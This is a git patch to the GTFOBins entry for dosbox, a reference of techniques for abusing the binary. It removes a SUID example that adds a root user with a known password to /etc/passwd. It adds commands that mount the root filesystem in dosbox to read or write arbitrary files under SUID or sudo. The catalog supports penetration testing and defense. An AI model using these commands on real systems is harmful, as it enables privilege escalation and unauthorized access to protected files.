From a846a1699315bd340ebb9dfac85cf453267acc36 Mon Sep 17 00:00:00 2001 From: Andrea Cardaci Date: Tue, 31 Aug 2021 23:14:27 +0200 Subject: [PATCH] Generalize dosbox --- _gtfobins/dosbox.md | 31 +++++++++++++++++++++++++------ 1 file changed, 25 insertions(+), 6 deletions(-) diff --git a/_gtfobins/dosbox.md b/_gtfobins/dosbox.md index b46c637..656896a 100644 --- a/_gtfobins/dosbox.md +++ b/_gtfobins/dosbox.md @@ -1,10 +1,29 @@ --- +description: Basically `dosbox` allows to mount the local file system, so that it can be altered using DOS commands. Note that the DOS filename convention ([8.3](https://en.wikipedia.org/wiki/8.3_filename)) is used. functions: - SUID: - - description: Please change username to whatever you want and passwod is `toor`. + file-read: + - description: The file content will be displayed in the DOSBox graphical window. code: | - cp /etc/passwd /tmp/passwd - echo "idealphase:sXuCKi7k3Xh/s:0:0::/root:/bin/bash" >> /tmp/passwd - /usr/bin/dosbox -c "mount c /etc/" -c "mount d /tmp/" -c "d:" -c "copy passwd c:" - su idealphase + LFILE='\path\to\file_to_read' + dosbox -c 'mount c /' -c "type c:$LFILE" + - description: The file is copied to a readable location. + code: | + LFILE='\path\to\file_to_read' + dosbox -c 'mount c /' -c "copy c:$LFILE >c:\tmp\output" -c exit + cat '/tmp/OUTPUT' + file-write: + - description: Note that the name of the written file in the following example will be `FILE_TO_`. + code: | + LFILE='\path\to\file_to_write' + dosbox -c 'mount c /' -c "echo DATA >c:$LFILE" -c exit + suid: + - description: Note that the name of the written file in the following example will be `FILE_TO_`. + code: | + LFILE='\path\to\file_to_write' + ./dosbox -c 'mount c /' -c "echo DATA >c:$LFILE" -c exit + sudo: + - description: Note that the name of the written file in the following example will be `FILE_TO_`. + code: | + LFILE='\path\to\file_to_write' + sudo dosbox -c 'mount c /' -c "echo DATA >c:$LFILE" -c exit ---